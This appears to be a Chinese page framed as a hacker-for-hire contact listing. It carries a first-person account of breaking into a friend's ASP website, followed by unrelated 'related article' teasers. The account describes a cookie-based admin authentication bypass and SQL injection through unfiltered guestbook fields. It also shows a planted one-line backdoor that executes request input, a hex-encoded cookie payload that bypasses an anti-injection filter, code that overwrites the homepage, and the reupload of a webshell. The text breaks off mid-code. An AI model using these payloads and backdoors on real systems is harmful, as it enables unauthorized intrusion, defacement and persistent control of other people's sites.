黑客接单平台-qq专业接单黑客联系方式

访客3年前关于黑客接单374

前不久我一个开网吧的朋友做了个网站,我对他的网站进行了一次安全检测,发现了一些漏洞,包括两个留言本漏洞和绕过通用防注入的漏洞。写出来共享一下。 一、小秋个性留言本管理验证漏洞 我朋友网站上有两个留言本,一个是小秋个性留言本,一个是倾听留言本(倾听留言本的问题等一下再说)。小秋个性留言本在后台验证你是否是管理员时有漏洞,我们来看代码:<%response.expires=0if request.cookies("loginok")="" thenresponse.redirect "login.asp"end if%>不用说了吧,只要cookies里的loginok值不是空你就是管理员了,而不在乎loginok到底是什么。就算loginok是千寂孤城也无所谓。所以在cookies里加上loginok=QJGC后再访问后台,你就是管理员了。并且后台的管理员回复没有过滤“<”和“>”,可以进行跨站攻击。 二、倾听留言本的漏洞 1、倾听留言本后台的管理员回复页面没有管理验证,直接在地址栏里访问/disp_msg.asp?id=62即可对id=62的帖子进行回复。注意,倾听留言本的贴子是默认从id=62开始记数的。 2、写留言时的指定头像路径可以绕过,在提交留言的表单中是这样选择头像的:head-1head-2head-3head-4……选好头像后把数据写入数据库时对图片的路径和大小都没有再检查,所以我们可以用网站上的任何找得到的图片作为自己的头像。只需要在本地重新构造一个表单来提交就可以了。我们完全可以找个巨幅的图片来玩玩。 3、提交留言时的SQL injection漏洞。我们先来看看提交留言时的代码是怎么写的:<% Sub add_msg()   nick_name=chhtml(request.form("nick_name"))  oicq=chhtml(request.form("oicq"))  pvc=request.form("pvc")  userip=Request.ServerVariables("HTTP_X_FORWARDED_FOR")   if userip=""then userip=Request.ServerVariables("REMOTE_ADDR")   touxiang=request.form("touxiang")  z_touxiang=chhtml(request.form("z_touxiang"))  t_h=chhtml(request.form("t_h"))  t_w=chhtml(request.form("t_w"))  e_mail=chhtml(request.form("e_mail"))  web_p=chhtml(request.form("web_p"))  title=chhtml(request.form("title"))  font_color=request.form("font_color")  msg_type=request.form("msg_type")  contents=UBB(chhtml(request.form("contents")))  exec="insert into msg_book(nick_name,oicq,pvc,ip_a,touxiang,z_touxiang,t_h,t_w,e_mail,web_p,title,font_color,msg_type,contents)values('"+nick_name+"','"+oicq+"','"+pvc+"','"+userip+"','"+touxiang+"','"+z_touxiang+"','"+t_h+"','"+t_w+"','"+e_mail+"','"+web_p+"','"+title+"','"+font_color+"','"+msg_type+"','"+contents+"')"  conn.execute exec  conn.close  set conn=nothing  response.Redirect "index.asp" End Sub%> 看到了吗,其中pvc、touxiang、font_color、msg_type都没有经过任何过滤就放到了查询语句中。为什么倾听这么大胆呢?因为这几个东西依次是“来自”、“头像”、“字体颜色”和“公开或是悄悄话”。前三个都是下拉菜单,最后一个是单选按扭。作者认为这几个很安全,但是我们可以在本地重新构造表单提交呀。 我写这篇文章前并未通知官方(http://www.qtice.com/),官方同样存在此漏洞,请大家不要去搞破坏。 三、通用防注入原来形同虚设 这是个很大的漏洞哦。 1、漏洞的发现 事情是这样的。我通过一些 *** 在朋友的网站上搞到一个webshell,然后又在某个页面上加了一句话后门:<%if request("qjgc")<>"" then execute request("qjgc")%>。后来朋友删了我的webshell,我就想利用这个一句话后门再写一个webshell进去。结果一提交就弹了个框框出来说我提交的数据非法,ip已记录。当时就郁闷了,忘了朋友用了通用防注入程序,也就是说我向一句话木马里提交的数据不能出现被通用防注入过滤掉的字符,否则就非法了。现在回想一下,其实通用防注入里过滤掉的字符并不多,只是针对sql注入的过滤,我们完全可以构造一个上传“上传小马”的代码提交过去,然后再利用那个“上传小马”来上传大马(上传小马里面没有include那些讨厌的防注入代码,可以提交任意数据)。但是我当时就完全没有这样想,像是短路了一样以为被过滤得什么数据都提交不了了。明知道有一句话木马却用不了,我很不甘心。突然我想到如果我用cookies来提交qjgc的值会怎样呢?于是打开MyBrowser实验了一下。打开MyBrowser,然后随便访问朋友网站上的一个欣赏flash的动态页面:/flash_show.asp?id=20。接着把地址栏中的?id=20删了,在cookies里面写上:; id=20,然后刷新一下,页面没有变化。把cookies里的id=20改成id=19再刷新一下,发现flash变了一个。这说明把url里的提交数据写进cookies里确实可行。现在来最重要的一步:把cookies改成id=20'后刷新,并没有出现那个什么提交非法数据的提示!成功绕过了通用防注入程序! 2、漏洞的利用 既然如此,那我们就通过cookies把qjgc的值提交进去。这里要注意,通过cookies提交数据一定要转换成16进制,否则会出错的。我之前一直不成功就这个原因。我们先来试试可不可以改他的主页。改主页的代码如下:a="":set fso=server.createObject("scripting.filesystemobject"):set file=fso.opentextfile("***index.asp",2,TRUE):file.write a :file.Close随便打开一个16进制转换工具,把以上代码放进去转换,得到一串16进制代码:%61%3D%22%3C%73%63%72%69%70%74%3E……全部复制下来,然后打开MyBrowser,来到有一句话木马的页面,在cookies那里加上:; qjgc=%61%3D%22%3C%73%63%72%69%70%74%3E……刷新一下,没有出错,再到首页去看一看,首页已经成功被我们修改了。接下来我又用此 *** 上传了一只asp马,webshell又回来了。 3、漏洞的原因 说实话到底为什么会成功我也不很清楚,我们先来看看通用防注入的代码: <% '--------定义部份---------

相关文章

javascript的navigator工具及属性userAgent

js test()方式用于检测一个字符串是否匹配某个模式,若是字符串中有匹配的值返回 true ,否则返回 false javascript的navigator工具  navigator为Windo...

iphone怎么拦截陌生短信

1、打开设置。2、点一下信息内容。3、不明与过虑信息内容。4、腾讯手机大管家。5、挑选开启。6、回到信息内容页面。7、挑选已阻拦的手机联系人。8、点一下增加。9、加上必须阻拦的手机联系人名册。 知名品...

黑客帝国全集国语完整版(黑客帝国国语迅雷下载)

黑客帝国全集国语完整版(黑客帝国国语迅雷下载)

本文导读目录: 1、黑客帝国1~3高清迅雷下载 2、黑客帝国全集中文字幕 有的给百度云链接 谢谢 只要百度云链接 3、求黑客帝国系列百度云 高清 4、黑客帝国国语版在哪能收看全集 5、...

如何搭建并运营优质的社区生态?

如何搭建并运营优质的社区生态?

在社区产品中,运营的角色是全方位地对社区生态做搭建与落地,在这个过程中运营人员关注的不只是零星几个数据指标,而是全局思考社区生态的建设与发展。 经过在工作中不断的学习、实践和思考,我逐渐开始理解为什...

产品经理必备思维方式——工程思维

产品经理必备思维方式——工程思维

编辑导读:工程思维是一种量力而行办理问题的综合思维,它可以或许正确界说问题,并告竣共鸣。本文从是什么、为什么、怎么做三个角度切入,对工程思维的详细浮现和应用举办了深入阐明探究,与各人分享。 本月有一...

南非国家传染病研究所初恋夫妇下车:测试疫苗是否对变异病

  (抗击新冠肺炎)南非国家传染病研究所:测试疫苗是否对变异病毒有效   中新网约翰内斯堡1月10日电 (记者 王曦)南非国家传染病研究所10日证实:南非医学专家目前正在测试即将投入使用的新冠肺炎疫...